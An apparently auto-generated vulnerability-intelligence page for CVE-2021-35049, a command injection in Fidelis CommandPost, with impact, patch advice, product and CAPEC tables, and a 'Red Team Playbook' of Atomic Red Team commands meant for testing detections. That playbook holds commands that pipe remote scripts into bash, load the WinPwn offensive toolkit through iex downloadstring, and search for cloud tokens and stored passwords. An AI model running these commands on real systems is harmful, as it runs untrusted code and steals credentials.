CVE-2021-35049
Overview
This vulnerability is an authenticated command injection affecting the web interface of Fidelis Cybersecurity's Network and Deception CommandPost products. The root cause lies in improper input validation of HTTP requests, allowing injection of system-level commands. The flaw specifically impacts the web management interface component, enabling execution of arbitrary commands within an authenticated session context.
Vulnerability Description
Vulnerability in Fidelis Network and Deception CommandPost enables authenticated command injection through the web interface. The vulnerability could allow a specially crafted HTTP request to execute system commands on the CommandPost and return results in an HTTP response in an authenticated session. The vulnerability is present in Fidelis Network and Deception versions prior to 9.3.7 and in version 9.4. Patches and updates are available to address this vulnerability.
Impact
An attacker with valid credentials can execute arbitrary system commands on the CommandPost server, potentially compromising system integrity and confidentiality. This requires network access to the web interface and authenticated session privileges (PR:L), with no user interaction needed (UI:N). Exploitation can lead to full system compromise, data exposure, or disruption of security monitoring capabilities. The CVSS vector (AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H) reflects high impact across confidentiality, integrity, and availability with low attack complexity.
Solution
Fidelis Security recommends updating affected products to version 9.3.7 or later to remediate this vulnerability. Detailed patch instructions and advisory information are available at the vendor's support portal: https://support.fidelissecurity.com/hc/en-us/categories/360001842694-Advisories-News-and-Policies. Applying these updates to both Fidelis Network and Deception CommandPost products is required to eliminate the command injection flaw.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability present in the Fidelis Network and Deception CommandPost arises from improper handling of user input within its web interface, specifically allowing for authenticated command injection. This flaw enables an attacker with valid credentials to craft malicious HTTP requests that can execute arbitrary system commands on the server. The results of these commands can then be returned in the HTTP response, effectively granting the attacker unauthorized access to sensitive system functionalities and data. The affected versions of the product, prior to 9.3.7 and including 9.4, are particularly susceptible due to the lack of adequate input validation and sanitization mechanisms.
Exploitation of this vulnerability can occur through various attack vectors, primarily targeting authenticated users. An attacker could leverage social engineering tactics to gain legitimate access credentials or exploit weak password policies to authenticate themselves. Once inside the system, the attacker can send specially crafted requests that manipulate the underlying command execution processes. For instance, they could execute commands to read sensitive files, modify system configurations, or even deploy additional malware. The ease of exploitation, combined with the potential for significant system compromise, underscores the critical nature of this vulnerability.
The real-world impact of this vulnerability can be substantial, particularly for organizations relying on Fidelis Network and Deception for security operations. Successful exploitation could lead to unauthorized access to sensitive data, disruption of services, and potential breaches of regulatory compliance, which can result in financial penalties and reputational damage. Additionally, the ability to execute arbitrary commands may allow attackers to pivot within the network, escalating their privileges and further compromising the integrity of the entire system. The business risks associated with such vulnerabilities extend beyond immediate financial losses, encompassing long-term impacts on customer trust and operational resilience.
To effectively detect and mitigate this vulnerability, organizations should implement a multi-layered security approach. Regularly updating and patching systems to the latest versions is crucial, as updates often contain critical security fixes. Additionally, organizations should employ intrusion detection systems (IDS) that can identify unusual patterns of behavior indicative of command injection attempts. Conducting regular security audits and penetration testing can also help identify potential weaknesses before they can be exploited. Furthermore, adopting strict access controls and implementing robust authentication mechanisms can significantly reduce the risk of unauthorized access to the web interface.
In conclusion, the command injection vulnerability in Fidelis Network and Deception CommandPost poses a serious threat to organizations utilizing these products. The potential for exploitation through authenticated sessions highlights the importance of maintaining rigorous security practices, including timely updates, vigilant monitoring, and comprehensive access controls. By prioritizing these strategies, organizations can better protect themselves against the risks associated with this and similar vulnerabilities, ensuring the integrity and security of their critical systems.
CSURFACE threat intelligence has identified a marked increase in the Exploit Prediction Scoring System (EPSS) score for CVE-2021-35049, reflecting a growing likelihood of exploitation attempts in the near term. Although no new exploit techniques or proof-of-concept code have been publicly disclosed, the upward trend in EPSS—now approaching the 0.05 threshold and ranking in the 90th percentile—signals heightened adversary interest and potential preparatory activity. This escalation suggests that threat actors may be refining or deploying targeted attacks against vulnerable Fidelis Network and Deception CommandPost installations, particularly in environments where authenticated access can be obtained. For defenders, this shift underscores an increased urgency to monitor for indicators of compromise related to command injection attempts and to reassess the robustness of authentication controls. While the overall threat level remains high due to the vulnerability’s nature and impact, the recent EPSS surge elevates the immediacy of risk, warranting enhanced vigilance despite the absence of new exploit disclosures.
Affected Products (4)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Fidelissecurity | Deception | All |
cpe:2.3:a:fidelissecurity:deception:*:*:*:*:*:*:*:*
|
|
|
Fidelissecurity | Deception | 9.4 |
cpe:2.3:a:fidelissecurity:deception:9.4:*:*:*:*:*:*:*
|
|
|
Fidelissecurity | Network | All |
cpe:2.3:a:fidelissecurity:network:*:*:*:*:*:*:*:*
|
|
|
Fidelissecurity | Network | 9.4 |
cpe:2.3:a:fidelissecurity:network:9.4:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-88 | OS Command Injection |
55%
|
High | High | |
| CAPEC-6 | Argument Injection |
51%
|
High | High | |
| CAPEC-43 | Exploiting Multiple Input Interpretation Layers |
48%
|
Medium | High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2021-35049 |
| support.fidelissecurity.com |
GitHub CVE
x_refsource_CONFIRM
|
https://support.fidelissecurity.com/hc/en-us/categories/360001842694-Advisories-News-and-Policies |
| securifera.com |
GitHub CVE
x_refsource_MISC
|
https://www.securifera.com/blog/2021/06/24/operation-eagle-eye/ |